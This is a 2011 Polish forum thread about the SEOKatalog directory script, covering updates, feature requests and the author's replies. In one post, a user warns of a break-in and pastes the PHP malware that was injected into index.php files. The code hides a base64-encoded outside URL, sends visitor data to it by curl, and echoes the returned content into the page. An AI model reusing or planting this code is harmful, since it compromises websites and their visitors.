General_Depet Opublikowano 23 Września 2011 Autor Udostępnij Opublikowano 23 Września 2011 Pewnie dlatego że zaktualizowałeś katalog do nowej wersji ale nie wprowadziłeś w templatce obowiązkowych zmian w pliku readme_update-polish.txt iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
michal24 Opublikowano 23 Września 2011 Udostępnij Opublikowano 23 Września 2011 Witam. Dla zainteresowanych mam do sprzedaży 2 skórki wraz z domenami. Więcej informacji pod: https://www.forum.optymalizacja.com/index.p...howtopic=132760 Fotografia portretowa Warszawa - specjalna oferta dla użytkowników Pio, Facebook, Google + Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Psik Opublikowano 24 Września 2011 Udostępnij Opublikowano 24 Września 2011 jakby kogoś interesowała sprawa z wirusem, po włamaniu na serwer ftp modyfikuje każdy plik 'index.php' (home i footer też spotkałem podmienione) i dodaje tam ten kod : <?php // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } ?> Z przeszłości zostały jeszcze: Katalog Turystyczny, s3zow.pl Blog o pozycjonowaniu i optymalizacji prowadzę pod adresem: https://zeid.pl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
sqnbn Opublikowano 25 Września 2011 Udostępnij Opublikowano 25 Września 2011 Witajcie, mam takie pytanie, czy propozycja dodania funkcji mailingu w panelu admina jest w fazie 'do wdrożenia' czy też jest ona zarzucona z jakiś przyczyn ? Radiosud - Matchbanker / Tarnowska - Matchbanker Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
General_Depet Opublikowano 25 Września 2011 Autor Udostępnij Opublikowano 25 Września 2011 W roboczej 1.5 jest już zrobiona. iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
MaxPan Opublikowano 26 Września 2011 Udostępnij Opublikowano 26 Września 2011 Przydało by się blokowanie całej domeny e-mail mam takich jednych delikwentów co zakładają konta seo142@prm-------ment.pl ( na swojej domenie) leca dublikatami 100% towymi , lecą prze proxy , jeśli by była taka możliwość to zbanowałem by cala domenę w email i był by spokój Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
mmr88 Opublikowano 26 Września 2011 Udostępnij Opublikowano 26 Września 2011 Racja, wiem o czym mówisz, blokowanie całej domeny e-mail było by spoko opcją. Im więcej zabezpieczeń/blokad dla spamerów tym lepiej. Agencja SEO z Katowic Intoseo - Pozycjonowanie Katowice Wynajem myjek przemysłowych i warsztatowych - www.myjki360.pl Dywaniki samochodowe https://topdywaniki.pl/ Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
ebsand Opublikowano 26 Września 2011 Udostępnij Opublikowano 26 Września 2011 a jest możliwość wprowadzenia poprawki, aby można było dodawać adresy z protokołem https? SEO, SEO i SEO Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
General_Depet Opublikowano 26 Września 2011 Autor Udostępnij Opublikowano 26 Września 2011 (edytowane) MaxPan napisał(a): Przydało by się blokowanie całej domeny e-mail mam takich jednych delikwentów co zakładają konta seo142@prm-------ment.pl ( na swojej domenie) leca dublikatami 100% towymi , lecą prze proxy , jeśli by była taka możliwość to zbanowałem by cala domenę w email i był by spokój ebsand napisał(a): a jest możliwość wprowadzenia poprawki, aby można było dodawać adresy z protokołem https? Aż dziwne że tak proste ułatwienia nie zostały zaproponowane wcześniej - właśnie dorobiłem w roboczej 1.5. Wielki dzięki Edytowane 26 Września 2011 przez General_Depet iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Andddrew Opublikowano 26 Września 2011 Udostępnij Opublikowano 26 Września 2011 Jak z crona wywoływać sprawdzanie czy strona która jest w katalogu cały czas istnieje? Nie mogę znaleźć takiej informacji Mój katalog stron. | ulubiony katalog stron: mocny katalog firm | kup tani MULTIKOD - 7 zł za 30 wpisów Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
General_Depet Opublikowano 26 Września 2011 Autor Udostępnij Opublikowano 26 Września 2011 Nie ma takiej opcji - już to wielokrotnie pisałem że to trochę bez sensu bo z poziomu phpa możesz jedynie sprawdzać czy strona zwraca cokolwiek w nagłówku ale już np. sytuacji gdy pod tą samą domeną jest już inna strona system nie wychwyci bo jak? Lepiej żeby to sami użytkownicy raportowali. iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Andddrew Opublikowano 26 Września 2011 Udostępnij Opublikowano 26 Września 2011 Ok rozumiem, choć nie do końca się zgadzam. Bo owszem czasem ktoś zaraportuje, ale bardzo rzadko. No nic pozostaje xenu od czasu do czasu. Mam jeszcze jedno pytanie - czy bedzie możliwość ustawiania kolejności wyświetlania podkategorii? Bo losowo za bardzo mi nie odpowiada, a alfabetycznie też nie Mój katalog stron. | ulubiony katalog stron: mocny katalog firm | kup tani MULTIKOD - 7 zł za 30 wpisów Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
salab Opublikowano 27 Września 2011 Udostępnij Opublikowano 27 Września 2011 W czasie dzisiejszej moderacji wpadły mi do głowy dwa pomysły: 1) Możliwość zablokowania dodawania w opisie strony linków do strony głównej (czyli takich samych jak jest dodawana strona) 2) Zablokowanie wstawiania linków do innych stron (często ludzie dają w opisie linki do innych domen/podlinkowują wpisy itp) Web Systems: strony www, ecommerce, integracje, marketing internetowy... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Xemix Opublikowano 27 Września 2011 Udostępnij Opublikowano 27 Września 2011 Jakoś na początku przeoczyłem zmianę struktury linków - czy jest sens teraz zmieniać strukturę, gdy katalog jest już trochę w sieci i ma sporo wpisów? Jeżeli tak to zastosować przekierowanie 301 z starych na nowe linki? Tylko jak to fajnie rozwiązać, aby nie było setek tysięcy kombinacji. Tylko czy jest sens? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
st4siu Opublikowano 29 Września 2011 Udostępnij Opublikowano 29 Września 2011 Po zmianie mojego maila formularz kontaktowy nadal wysyła meila na mojego starego maila Jak to naprawić ? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi